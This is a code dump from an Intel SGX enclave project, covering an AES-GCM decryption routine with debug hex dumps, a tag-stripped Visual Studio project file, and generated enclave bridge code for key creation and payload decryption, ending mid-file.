| 305 | 306 | // // KEY 307 | // const sgx_aes_gcm_128bit_key_t* p_key = (const sgx_aes_gcm_128bit_key_t*) sym_shared_key; 308 | 309 | // // Payload 310 | // const char* message = "This ia a long string to encrypt. Some of it will be very very very long!!!!"; 311 | // const uint8_t* p_src = (const uint8_t*)message; 312 | // size_t src_message_sz = strlen(message); 313 | 314 | // size_t dst_message_sz = src_message_sz + SGX_AESGCM_KEY_SIZE + SGX_AESGCM_IV_SIZE; 315 | 316 | // // Destination 317 | // eprintf("enc IV: %02x\n", iv); 318 | // eprintf("src_message_sz: %d\n", src_message_sz); 319 | // //eprintf("Allocating dst_message_sz %d\n", (dst_message_sz * sizeof(uint8_t)) ); 320 | // //uint8_t* p_dst = (uint8_t*)malloc(dst_message_sz * sizeof(uint8_t)); 321 | // eprintf("Allocating dst_message_sz %d\n", dst_message_sz ); 322 | // uint8_t* p_dst = (uint8_t*)malloc(dst_message_sz); 323 | 324 | // //ENCRYPTION 325 | // ret = sgx_rijndael128GCM_encrypt( 326 | // p_key, 327 | // p_src, 328 | // (uint32_t) src_message_sz, 329 | // p_dst, 330 | // iv, 331 | // SGX_AESGCM_IV_SIZE, 332 | // NULL, 333 | // 0, 334 | // &mac 335 | // ); 336 | 337 | 338 | // if (ret != SGX_SUCCESS) { 339 | //eprintf("ret: %d\n", ret); 340 | // if (ret == SGX_ERROR_INVALID_PARAMETER) { 341 | // eprintf("%s\n", "SGX_ERROR_INVALID_PARAMETER"); 342 | // } 343 | // if (ret == SGX_ERROR_UNEXPECTED) { 344 | // eprintf("%s\n", "SGX_ERROR_UNEXPECTED"); 345 | // } 346 | // } 347 | // else { 348 | // // Teminate with \0 so we can strlen 349 | // // *(p_dst + dst_message_sz) = '\0'; 350 | // eprintf("enc: %s\n", p_dst); 351 | // DumpHex(p_dst, dst_message_sz); 352 | 353 | // eprintf("%s\n", "computed mac"); 354 | // DumpHex((void*) mac, SGX_AESGCM_MAC_SIZE); 355 | // } 356 | 357 | 358 | eprintf("--- %s --- \n", "Decrypting"); 359 | const sgx_aes_gcm_128bit_key_t* p_key = (const sgx_aes_gcm_128bit_key_t*)sym_shared_key; 360 | uint8_t* dec_message = (uint8_t*)malloc(encryptedDataSize); 361 | 362 | size_t cypertext_len = encryptedDataSize - (SGX_AESGCM_IV_SIZE + SGX_AESGCM_MAC_SIZE); 363 | 364 | //DECRYPTION 365 | eprintf("Encrypted buffer (p_dst) : %d\n", encryptedDataSize); 366 | DumpHex(encryptedData, encryptedDataSize); 367 | 368 | ret = sgx_rijndael128GCM_decrypt( 369 | p_key, 370 | encryptedData, 371 | (uint32_t)encryptedDataSize, 372 | dec_message, 373 | iv, 374 | SGX_AESGCM_IV_SIZE, 375 | NULL, 376 | 0, 377 | mac2 378 | ); 379 | 380 | if (ret != SGX_SUCCESS) { 381 | eprintf("ret: %d\n", ret); 382 | if (ret == SGX_ERROR_INVALID_PARAMETER) { 383 | eprintf("%s\n", "SGX_ERROR_INVALID_PARAMETER"); 384 | } 385 | if (ret == SGX_ERROR_UNEXPECTED) { 386 | eprintf("%s\n", "SGX_ERROR_UNEXPECTED"); 387 | } 388 | if (ret == SGX_ERROR_MAC_MISMATCH) { 389 | eprintf("%s\n", "SGX_ERROR_MAC_MISMATCH "); 390 | } 391 | } 392 | else { 393 | // Teminate with \0 so we can strlen 394 | eprintf("dec: %s\n", dec_message); 395 | DumpHex(dec_message, encryptedDataSize); 396 | } 397 | 398 | return dec_message; 399 | } 400 | -------------------------------------------------------------------------------- /App/App.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Prerelease 10 | Win32 11 | 12 | 13 | Prerelease 14 | x64 15 | 16 | 17 | Release 18 | Win32 19 | 20 | 21 | Debug 22 | x64 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | Simulation 30 | Win32 31 | 32 | 33 | Simulation 34 | x64 35 | 36 | 37 | 38 | 16.0 39 | Win32Proj 40 | {c198e4d9-1292-4730-a24e-5aa31c1afd44} 41 | App 42 | 10.0 43 | 44 | 45 | 46 | Application 47 | true 48 | v142 49 | Unicode 50 | 51 | 52 | Application 53 | true 54 | v142 55 | Unicode 56 | 57 | 58 | Application 59 | false 60 | v142 61 | true 62 | Unicode 63 | 64 | 65 | Application 66 | false 67 | v142 68 | true 69 | Unicode 70 | 71 | 72 | Application 73 | true 74 | v142 75 | Unicode 76 | 77 | 78 | Application 79 | true 80 | v142 81 | Unicode 82 | 83 | 84 | Application 85 | false 86 | v142 87 | true 88 | Unicode 89 | 90 | 91 | Application 92 | false 93 | v142 94 | true 95 | Unicode 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | true 129 | 130 | 131 | true 132 | 133 | 134 | false 135 | 136 | 137 | false 138 | 139 | 140 | true 141 | 142 | 143 | true 144 | 145 | 146 | false 147 | 148 | 149 | false 150 | 151 | 152 | 153 | Level3 154 | true 155 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 156 | true 157 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 158 | 159 | 160 | Console 161 | true 162 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 163 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 164 | 165 | 166 | 167 | 168 | Level3 169 | true 170 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 171 | true 172 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 173 | 174 | 175 | Console 176 | true 177 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 178 | sgx_urts_sim.lib;sgx_uae_service_sim.lib;%(AdditionalDependencies) 179 | 180 | 181 | 182 | 183 | Level3 184 | true 185 | true 186 | true 187 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 188 | true 189 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 190 | 191 | 192 | Console 193 | true 194 | true 195 | true 196 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 197 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 198 | 199 | 200 | 201 | 202 | Level3 203 | true 204 | true 205 | true 206 | EDEBUG;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 207 | true 208 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 209 | 210 | 211 | Console 212 | true 213 | true 214 | true 215 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 216 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 217 | 218 | 219 | 220 | 221 | Level3 222 | true 223 | _DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;WIN32_LEAN_AND_MEAN;%(PreprocessorDefinitions) 224 | true 225 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 226 | 227 | 228 | Console 229 | true 230 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 231 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 232 | 233 | 234 | 235 | 236 | Level3 237 | true 238 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 239 | true 240 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 241 | 242 | 243 | Console 244 | true 245 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 246 | sgx_urts_sim.lib;sgx_uae_service_sim.lib;%(AdditionalDependencies) 247 | 248 | 249 | 250 | 251 | Level3 252 | true 253 | true 254 | true 255 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 256 | true 257 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 258 | 259 | 260 | Console 261 | true 262 | true 263 | true 264 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 265 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 266 | 267 | 268 | 269 | 270 | Level3 271 | true 272 | true 273 | true 274 | EDEBUG;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 275 | true 276 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 277 | 278 | 279 | Console 280 | true 281 | true 282 | true 283 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 284 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | -------------------------------------------------------------------------------- /Enclave2/Enclave2_t.c: -------------------------------------------------------------------------------- 1 | #include "Enclave2_t.h" 2 | 3 | #include "sgx_trts.h" /* for sgx_ocalloc, sgx_is_outside_enclave */ 4 | #include "sgx_lfence.h" /* for sgx_lfence */ 5 | 6 | #include 7 | #include /* for memcpy_s etc */ 8 | #include /* for malloc/free etc */ 9 | 10 | #define CHECK_REF_POINTER(ptr, siz) do { \ 11 | if (!(ptr) || ! sgx_is_outside_enclave((ptr), (siz))) \ 12 | return SGX_ERROR_INVALID_PARAMETER;\ 13 | } while (0) 14 | 15 | #define CHECK_UNIQUE_POINTER(ptr, siz) do { \ 16 | if ((ptr) && ! sgx_is_outside_enclave((ptr), (siz))) \ 17 | return SGX_ERROR_INVALID_PARAMETER;\ 18 | } while (0) 19 | 20 | #define CHECK_ENCLAVE_POINTER(ptr, siz) do { \ 21 | if ((ptr) && ! sgx_is_within_enclave((ptr), (siz))) \ 22 | return SGX_ERROR_INVALID_PARAMETER;\ 23 | } while (0) 24 | 25 | #define ADD_ASSIGN_OVERFLOW(a, b) ( \ 26 | ((a) += (b)) < (b) \ 27 | ) 28 | 29 | 30 | typedef struct ms_ecall_do_trusted_t { 31 | int ms_retval; 32 | int ms_check; 33 | } ms_ecall_do_trusted_t; 34 | 35 | typedef struct ms_createRsaKeyPairEcall_t { 36 | char* ms_public_key_raw_out; 37 | char* ms_public_key_out; 38 | } ms_createRsaKeyPairEcall_t; 39 | 40 | typedef struct ms_storeSymKeyEcall_t { 41 | unsigned char* ms_encrypted_payload; 42 | size_t ms_encrypted_payload_len; 43 | } ms_storeSymKeyEcall_t; 44 | 45 | typedef struct ms_decryptPayloadEcall_t { 46 | unsigned char* ms_encrypted_payload; 47 | size_t ms_encrypted_payload_len; 48 | unsigned char* ms_mac; 49 | } ms_decryptPayloadEcall_t; 50 | 51 | typedef struct ms_ecall_do_trusted_inside_ocall_t { 52 | int ms_retval; 53 | } ms_ecall_do_trusted_inside_ocall_t; 54 | 55 | typedef struct ms_ocall_print_t { 56 | const char* ms_str; 57 | } ms_ocall_print_t; 58 | 59 | typedef struct ms_sgx_oc_cpuidex_t { 60 | int* ms_cpuinfo; 61 | int ms_leaf; 62 | int ms_subleaf; 63 | } ms_sgx_oc_cpuidex_t; 64 | 65 | typedef struct ms_sgx_thread_wait_untrusted_event_ocall_t { 66 | int ms_retval; 67 | const void* ms_self; 68 | } ms_sgx_thread_wait_untrusted_event_ocall_t; 69 | 70 | typedef struct ms_sgx_thread_set_untrusted_event_ocall_t { 71 | int ms_retval; 72 | const void* ms_waiter; 73 | } ms_sgx_thread_set_untrusted_event_ocall_t; 74 | 75 | typedef struct ms_sgx_thread_setwait_untrusted_events_ocall_t { 76 | int ms_retval; 77 | const void* ms_waiter; 78 | const void* ms_self; 79 | } ms_sgx_thread_setwait_untrusted_events_ocall_t; 80 | 81 | typedef struct ms_sgx_thread_set_multiple_untrusted_events_ocall_t { 82 | int ms_retval; 83 | const void** ms_waiters; 84 | size_t ms_total; 85 | } ms_sgx_thread_set_multiple_untrusted_events_ocall_t; 86 | 87 | #ifdef _MSC_VER 88 | #pragma warning(push) 89 | #pragma warning(disable: 4127) 90 | #pragma warning(disable: 4200) 91 | #endif 92 | 93 | static sgx_status_t SGX_CDECL sgx_ecall_do_trusted(void* pms) 94 | { 95 | CHECK_REF_POINTER(pms, sizeof(ms_ecall_do_trusted_t)); 96 | // 97 | // fence after pointer checks 98 | // 99 | sgx_lfence(); 100 | ms_ecall_do_trusted_t* ms = SGX_CAST(ms_ecall_do_trusted_t*, pms); 101 | sgx_status_t status = SGX_SUCCESS; 102 | 103 | 104 | 105 | ms->ms_retval = ecall_do_trusted(ms->ms_check); 106 | 107 | 108 | return status; 109 | } 110 | 111 | static sgx_status_t SGX_CDECL sgx_createRsaKeyPairEcall(void* pms) 112 | { 113 | CHECK_REF_POINTER(pms, sizeof(ms_createRsaKeyPairEcall_t)); 114 | // 115 | // fence after pointer checks 116 | // 117 | sgx_lfence(); 118 | ms_createRsaKeyPairEcall_t* ms = SGX_CAST(ms_createRsaKeyPairEcall_t*, pms); 119 | sgx_status_t status = SGX_SUCCESS; 120 | char* _tmp_public_key_raw_out = ms->ms_public_key_raw_out; 121 | size_t _len_public_key_raw_out = 384; 122 | char* _in_public_key_raw_out = NULL; 123 | char* _tmp_public_key_out = ms->ms_public_key_out; 124 | size_t _len_public_key_out = 388; 125 | char* _in_public_key_out = NULL; 126 | 127 | CHECK_UNIQUE_POINTER(_tmp_public_key_raw_out, _len_public_key_raw_out); 128 | CHECK_UNIQUE_POINTER(_tmp_public_key_out, _len_public_key_out); 129 | 130 | // 131 | // fence after pointer checks 132 | // 133 | sgx_lfence(); 134 | 135 | if (_tmp_public_key_raw_out != NULL && _len_public_key_raw_out != 0) { 136 | if ( _len_public_key_raw_out % sizeof(*_tmp_public_key_raw_out) != 0) 137 | { 138 | status = SGX_ERROR_INVALID_PARAMETER; 139 | goto err; 140 | } 141 | if ((_in_public_key_raw_out = (char*)malloc(_len_public_key_raw_out)) == NULL) { 142 | status = SGX_ERROR_OUT_OF_MEMORY; 143 | goto err; 144 | } 145 | 146 | memset((void*)_in_public_key_raw_out, 0, _len_public_key_raw_out); 147 | } 148 | if (_tmp_public_key_out != NULL && _len_public_key_out != 0) { 149 | if ( _len_public_key_out % sizeof(*_tmp_public_key_out) != 0) 150 | { 151 | status = SGX_ERROR_INVALID_PARAMETER; 152 | goto err; 153 | } 154 | if ((_in_public_key_out = (char*)malloc(_len_public_key_out)) == NULL) { 155 | status = SGX_ERROR_OUT_OF_MEMORY; 156 | goto err; 157 | } 158 | 159 | memset((void*)_in_public_key_out, 0, _len_public_key_out); 160 | } 161 | 162 | createRsaKeyPairEcall(_in_public_key_raw_out, _in_public_key_out); 163 | if (_in_public_key_raw_out) { 164 | if (memcpy_s(_tmp_public_key_raw_out, _len_public_key_raw_out, _in_public_key_raw_out, _len_public_key_raw_out)) { 165 | status = SGX_ERROR_UNEXPECTED; 166 | goto err; 167 | } 168 | } 169 | if (_in_public_key_out) { 170 | if (memcpy_s(_tmp_public_key_out, _len_public_key_out, _in_public_key_out, _len_public_key_out)) { 171 | status = SGX_ERROR_UNEXPECTED; 172 | goto err; 173 | } 174 | } 175 | 176 | err: 177 | if (_in_public_key_raw_out) free(_in_public_key_raw_out); 178 | if (_in_public_key_out) free(_in_public_key_out); 179 | return status; 180 | } 181 | 182 | static sgx_status_t SGX_CDECL sgx_storeSymKeyEcall(void* pms) 183 | { 184 | CHECK_REF_POINTER(pms, sizeof(ms_storeSymKeyEcall_t)); 185 | // 186 | // fence after pointer checks 187 | // 188 | sgx_lfence(); 189 | ms_storeSymKeyEcall_t* ms = SGX_CAST(ms_storeSymKeyEcall_t*, pms); 190 | sgx_status_t status = SGX_SUCCESS; 191 | unsigned char* _tmp_encrypted_payload = ms->ms_encrypted_payload; 192 | size_t _tmp_encrypted_payload_len = ms->ms_encrypted_payload_len; 193 | size_t _len_encrypted_payload = _tmp_encrypted_payload_len; 194 | unsigned char* _in_encrypted_payload = NULL; 195 | 196 | CHECK_UNIQUE_POINTER(_tmp_encrypted_payload, _len_encrypted_payload); 197 | 198 | // 199 | // fence after pointer checks 200 | // 201 | sgx_lfence(); 202 | 203 | if (_tmp_encrypted_payload != NULL && _len_encrypted_payload != 0) { 204 | if ( _len_encrypted_payload % sizeof(*_tmp_encrypted_payload) != 0) 205 | { 206 | status = SGX_ERROR_INVALID_PARAMETER; 207 | goto err; 208 | } 209 | _in_encrypted_payload = (unsigned char*)malloc(_len_encrypted_payload); 210 | if (_in_encrypted_payload == NULL) { 211 | status = SGX_ERROR_OUT_OF_MEMORY; 212 | goto err; 213 | } 214 | 215 | if (memcpy_s(_in_encrypted_payload, _len_encrypted_payload, _tmp_encrypted_payload, _len_encrypted_payload)) { 216 | status = SGX_ERROR_UNEXPECTED; 217 | goto err; 218 | } 219 | 220 | } 221 | 222 | storeSymKeyEcall(_in_encrypted_payload, _tmp_encrypted_payload_len); 223 | 224 | err: 225 | if (_in_encrypted_payload) free(_in_encrypted_payload); 226 | return status; 227 | } 228 | 229 | static sgx_status_t SGX_CDECL sgx_decryptPayloadEcall(void* pms) 230 | { 231 | CHECK_REF_POINTER(pms, sizeof(ms_decryptPayloadEcall_t)); 232 | // 233 | // fence after pointer checks 234 | // 235 | sgx_lfence(); 236 | ms_decryptPayloadEcall_t* ms = SGX_CAST(ms_decryptPayloadEcall_t*, pms); 237 | sgx_status_t status = SGX_SUCCESS; 238 | unsigned char* _tmp_encrypted_payload = ms->ms_encrypted_payload; 239 | size_t _tmp_encrypted_payload_len = ms->ms_encrypted_payload_len; 240 | size_t _len_encrypted_payload = _tmp_encrypted_payload_len; 241 | unsigned char* _in_encrypted_payload = NULL; 242 | unsigned char* _tmp_mac = ms->ms_mac; 243 | size_t _len_mac = 16; 244 | unsigned char* _in_mac = NULL; 245 | 246 | CHECK_UNIQUE_POINTER(_tmp_encrypted_payload, _len_encrypted_payload); 247 | CHECK_UNIQUE_POINTER(_tmp_mac, _len_mac); 248 | 249 | // 250 | // fence after pointer checks 251 | // 252 | sgx_lfence(); 253 | 254 | if (_tmp_encrypted_payload != NULL && _len_encrypted_payload != 0) { 255 | if ( _len_encrypted_payload % sizeof(*_tmp_encrypted_payload) != 0) 256 | { 257 | status = SGX_ERROR_INVALID_PARAMETER; 258 | goto err; 259 | } 260 | _in_encrypted_payload = (unsigned char*)malloc(_len_encrypted_payload); 261 | if (_in_encrypted_payload == NULL) { 262 | status = SGX_ERROR_OUT_OF_MEMORY; 263 | goto err; 264 | } 265 | 266 | if (memcpy_s(_in_encrypted_payload, _len_encrypted_payload, _tmp_encrypted_payload, _len_encrypted_payload)) { 267 | status = SGX_ERROR_UNEXPECTED; 268 | goto err; 269 | } 270 | 271 | } 272 | if (_tmp_mac != NULL && _len_mac != 0) { 273 | if ( _len_mac % sizeof(*_tmp_mac) != 0) 274 | { 275 | status = SGX_ERROR_INVALID_PARAMETER; 276 | goto err; 277 | } 278 | _in_mac = (unsigned char*)malloc(_len_mac); 279 | if (_in_mac == NULL) { 280 | status = SGX_ERROR_OUT_OF_MEMORY; 281 | goto err; 282 | } 283 | 284 | if (memcpy_s(_in_mac, _len_mac, _tmp_mac, _len_mac)) { 285 | status = SGX_ERROR_UNEXPECTED; 286 | goto err; 287 | } 288 | 289 | } 290 | 291 | decryptPayloadEcall(_in_encrypted_payload, _tmp_encrypted_payload_len, _in_mac); 292 | 293 | err: 294 | if (_in_encrypted_payload) free(_in_encrypted_payload); 295 | if (_in_mac) free(_in_mac); 296 | return status; 297 | } 298 | 299 | static sgx_status_t SGX_CDECL sgx_ecall_do_trusted_inside_ocall(void* pms) 300 | { 301 | CHECK_REF_POINTER(pms, sizeof(ms_ecall_do_trusted_inside_ocall_t)); 302 | // 303 | // fence after pointer checks 304 | // 305 | sgx_lfence(); 306 | ms_ecall_do_trusted_inside_ocall_t* ms = SGX_CAST(ms_ecall_do_trusted_inside_ocall_t*, pms); 307 | sgx_status_t status = SGX_SUCCESS; 308 | 309 | 310 | 311 | ms->ms_retval = ecall_do_trusted_inside_ocall(); 312 | 313 | 314 | return status; 315 | } 316 | 317 | SGX_EXTERNC const struct { 318 | size_t nr_ecall; 319 | struct {void* call_addr; uint8_t is_priv; uint8_t is_switchless;} ecall_table[5]; 320 | } g_ecall_table = { 321 | 5, 322 | { 323 | {(void*)(uintptr_t)sgx_ecall_do_trusted, 0, 0}, 324 | {(void*)(uintptr_t)sgx_createRsaKeyPairEcall, 0, 0}, 325 | {(void*)(uintptr_t)sgx_storeSymKeyEcall, 0, 0}, 326 | {(void*)(uintptr_t)sgx_decryptPayloadEcall, 0, 0}, 327 | {(void*)(uintptr_t)sgx_ecall_do_trusted_inside_ocall, 1, 0}, 328 | } 329 | }; 330 | 331 | SGX_EXTERNC const struct { 332 | size_t nr_ocall; 333 | uint8_t entry_table[6][5]; 334 | } g_dyn_entry_table = { 335 | 6, 336 | { 337 | {0, 0, 0, 0, 1, }, 338 | {0, 0, 0, 0, 0, }, 339 | {0, 0, 0, 0, 0, }, 340 | {0, 0, 0, 0, 0, }, 341 | {0, 0, 0, 0, 0, }, 342 | {0, 0, 0, 0, 0, }, 343 | } 344 | }; 345 | 346 | 347 | sgx_status_t SGX_CDECL ocall_print(const char* str) 348 | { 349 | sgx_status_t status = SGX_SUCCESS; 350 | size_t _len_str = str ? strlen(str) + 1 : 0; 351 | 352 | ms_ocall_print_t* ms = NULL; 353 | size_t ocalloc_size = sizeof(ms_ocall_print_t); 354 | void *__tmp = NULL; 355 | 356 | 357 | CHECK_ENCLAVE_POINTER(str, _len_str); 358 | 359 | if (ADD_ASSIGN_OVERFLOW(ocalloc_size, (str != NULL) ? _len_str : 0)) 360 | return SGX_ERROR_INVALID_PARAMETER; 361 | 362 | __tmp = sgx_ocalloc(ocalloc_size); 363 | if (__tmp == NULL) { 364 | sgx_ocfree(); 365 | return SGX_ERROR_UNEXPECTED; 366 | } 367 | ms = (ms_ocall_print_t*)__tmp; 368 | __tmp = (void *)((size_t)__tmp + sizeof(ms_ocall_print_t)); 369 | ocalloc_size -= sizeof(ms_ocall_print_t); 370 | 371 | if (str != NULL) { 372 | ms->ms_str = (const char*)__tmp; 373 | if (_len_str % sizeof(*str) != 0) { 374 | sgx_ocfree(); 375 | return SGX_ERROR_INVALID_PARAMETER; 376 | } 377 | if (memcpy_s(__tmp, ocalloc_size, str, _len_str)) { 378 | sgx_ocfree(); 379 | return SGX_ERROR_UNEXPECTED; 380 | } 381 | __tmp = (void *)((size_t)__tmp + _len_str); 382 | ocalloc_size -= _len_str; 383 | } else { 384 | ms->ms_str = NULL; 385 | } 386 | 387 | status = sgx_ocall(0, ms); 388 | 389 | if (status == SGX_SUCCESS) { 390 | } 391 | sgx_ocfree(); 392 | return status; 393 | } 394 | 395 | sgx_status_t SGX_CDECL sgx_oc_cpuidex(int cpuinfo[4], int leaf, int subleaf) 396 | { 397 | sgx_status_t status = SGX_SUCCESS; 398 | size_t _len_cpuinfo = 4 * sizeof(int); 399 | 400 | ms_sgx_oc_cpuidex_t* ms = NULL; 401 | size_t ocalloc_size = sizeof(ms_sgx_oc_cpuidex_t); 402 | void *__tmp = NULL; 403 | 404 | void *__tmp_cpuinfo = NULL; 405 | 406 | CHECK_ENCLAVE_POINTER(cpuinfo, _len_cpuinfo); 407 | 408 | if (ADD_ASSIGN_OVERFLOW(ocalloc_size, (cpuinfo != NULL) ? _len_cpuinfo : 0)) 409 | return SGX_ERROR_INVALID_PARAMETER; 410 | 411 | __tmp = sgx_ocalloc(ocalloc_size); 412 | if (__tmp == NULL) { 413 | sgx_ocfree(); 414 | return SGX_ERROR_UNEXPECTED; 415 | } 416 | ms = (ms_sgx_oc_cpuidex_t*)__tmp; 417 | __tmp = (void *)((size_t)__tmp + sizeof(ms_sgx_oc_cpuidex_t)); 418 | ocalloc_size -= sizeof(ms_sgx_oc_cpuidex_t); 419 | 420 | if (cpuinfo != NULL) { 421 | ms->ms_cpuinfo = (int*)__tmp; 422 | __tmp_cpuinfo = __tmp; 423 | if (_len_cpuinfo % sizeof(*cpuinfo) != 0) { 424 | sgx_ocfree(); 425 | return SGX_ERROR_INVALID_PARAMETER; 426 | } 427 | memset(__tmp_cpuinfo, 0, _len_cpuinfo); 428 | __tmp = (void *)((size_t)__tmp + _len_cpuinfo); 429 | ocalloc_size -= _len_cpuinfo; 430 | } else { 431 | ms->ms_cpuinfo = NULL; 432 | } 433 | 434 | ms->ms_leaf = leaf; 435 | ms->ms_subleaf = subleaf; 436 | status = sgx_ocall(1, ms); 437 | 438 | if (status == SGX_SUCCESS) { 439 | if (cpuinfo) { 440 | if (memcpy_s((void*)cpuinfo, _len_cpuinfo, __tmp_cpuinfo, _len_cpuinfo)) { 441 | sgx_ocfree(); 442 | return SGX_ERROR_UNEXPECTED; 443 | } 444 | } 445 | } 446 | sgx_ocfree(); 447 | return status; 448 | } 449 | 450 | sgx_status_t SGX_CDECL sgx_thread_wait_untrusted_event_ocall(int* retval, const void* self) 451 | { 452 | sgx_status_t status = SGX_SUCCESS; 453 | 454 | ms_sgx_thread_wait_untrusted_event_ocall_t* ms = NULL; 455 | size_t ocalloc_size = sizeof(ms_sgx_thread_wait_untrusted_event_ocall_t); 456 | void *__tmp = NULL; 457 | 458 | 459 | __tmp = sgx_ocalloc(ocalloc_size); 460 | if (__tmp == NULL) { 461 | sgx_ocfree(); 462 | return SGX_ERROR_UNEXPECTED; 463 | } 464 | ms = (ms_sgx_thread_wait_untrusted_event_ocall_t*)__tmp; 465 | __tmp = (void *)((size_t)__tmp + sizeof(ms_sgx_thread_wait_untrusted_event_ocall_t)); 466 | ocalloc_size -= sizeof(ms_sgx_thread_wait_untrusted_event_ocall_t); 467 | 468 | ms->ms_self = self; 469 | status = sgx_ocall(2, ms); 470 | 471 | if (status == SGX_SUCCESS) { 472 | if (retval) *retval = ms->ms_retval; 473 | } 474 | sgx_ocfree(); 475 | return status; 476 | } 477 | 478 | sgx_status_t SGX_CDECL sgx_thread_set_untrusted_event_ocall(int* retval, const void* waiter) 479 | { 480 | sgx_status_t status = SGX_SUCCESS; 481 | 482 | ms_sgx_thread_set_untrusted_event_ocall_t* ms = NULL; 483 | size_t ocalloc_size = sizeof(ms_sgx_thread_set_untrusted_event_ocall_t); 484 | void *__tmp = NULL; 485 | 486 | 487 | __tmp = sgx_ocalloc(ocalloc_size); 488 | if (__tmp == NULL) { 489 | sgx_ocfree(); 490 | return SGX_ERROR_UNEXPECTED; 491 | } 492 | ms = (ms_sgx_thread_set_untrusted_event_ocall_t*)__tmp; 493 | __tmp = (void *)((size_t)__tmp + sizeof(ms_sgx_thread_set_untrusted_event_ocall_t)); 494 | ocalloc_size -= sizeof(ms_sgx_thread_set_untrusted_event_ocall_t); 495 | 496 | ms->ms_waiter = waiter; 497 | status = sgx_ocall(3, ms); 498 | 499 | if (status == SGX_SUCCESS) { 500 | if (retval) *retval = ms->ms_retval; 501 | } 502 | sgx_ocfree(); 503 | return status; 504 | } 505 | 506 | sgx_status_t SGX_CDECL sgx_thread_setwait_untrusted_events_ocall(int* retval, const void* waiter, const void* self) 507 | { 508 | sgx_status_t status = SGX_SUCCESS; 509 | 510 | ms_sgx_thread_setwait_untrusted_events_ocall_t* ms = NULL; 511 | size_t ocalloc_size = sizeof(ms_sgx_thread_setwait_untrusted_events_ocall_t); 512 | void *__tmp = NULL; 513 | 514 | 515 | __tmp = sgx_ocalloc(ocalloc_size); 516 | if (__tmp == NULL) { 517 | sgx_ocfree(); 518 | return SGX_ERROR_UNEXPECTED; 519 | } 520 | ms = (ms_sgx_thread_setwait_untrusted_events_ocall_t*)__tmp; 521 | __tmp = (void *)((size_t)__tmp + sizeof(ms_sgx_thread_setwait_untrusted_events_ocall_t)); 522 | ocalloc_size -= sizeof(ms_sgx_thread_setwait_untrusted_events_ocall_t); 523 | 524 | ms->ms_waiter = waiter; 525 | ms->ms_self = self; 526 | status = sgx_ocall(4, ms); 527 | 528 | if (status == SGX_SUCCESS) { 529 | if (retval) *retval = ms->ms_retval; 530 | } 531 | sgx_ocfree(); 532 | return status; 533 | } 534 | 535 | sgx_status_t SGX_CDECL sgx_thread_set_multiple_untrusted_events_ocall(int* retval, const void** waiters, size_t total) 536 | { 537 | sgx_status_t status = SGX_SUCCESS; 538 | size_t _len_waiters = total * sizeof(void*); 539 | 540 | ms_sgx_thread_set_multiple_untrusted_events_ocall_t* ms = NULL; 541 | size_t ocalloc_size = sizeof(ms_sgx_thread_set_multiple_untrusted_events_ocall_t); 542 | void *__tmp = NULL; 543 | 544 | 545 | CHECK_ENCLAVE_POINTER(waiters, _len_waiters); 546 | 547 | if (ADD_ASSIGN_OVERFLOW(ocalloc_size, (waiters != NULL) ? _len_waiters : 0)) 548 | return SGX_ERROR_INVALID_PARAMETER; 549 | 550 | __tmp = sgx_ocalloc(ocalloc_size); 551 | if (__tmp == NULL) { 552 | sgx_ocfree(); 553 | return SGX_ERROR_UNEXPECTED; 554 | } 555 | ms = (ms_sgx_thread_set_multiple_untrusted_events_ocall_t*)__tmp; 556 | __tmp = (void *)((size_t)__tmp + sizeof(ms_sgx_thread_set_multiple_untrusted_events_ocall_t)); 557 | ocalloc_size -= sizeof(ms_sgx_thread_set_multiple_untrusted_events_ocall_t); 558 | 559 | if (waiters != NULL) { 560 | ms->ms_waiters = (const void**)__tmp; 561 | if (_len_waiters % sizeof(*waiters) != 0) { 562 | sgx_ocfree(); 563 | return SGX_ERROR_INVALID_PARAMETER; 564 | } 565 | if (memcpy_s(__tmp, ocalloc_size, waiters, _len_waiters)) { 566 | sgx_ocfree(); 567 | return SGX_ERROR_UNEXPECTED; 568 | } 569 | __tmp = (void *)((size_t)__tmp + 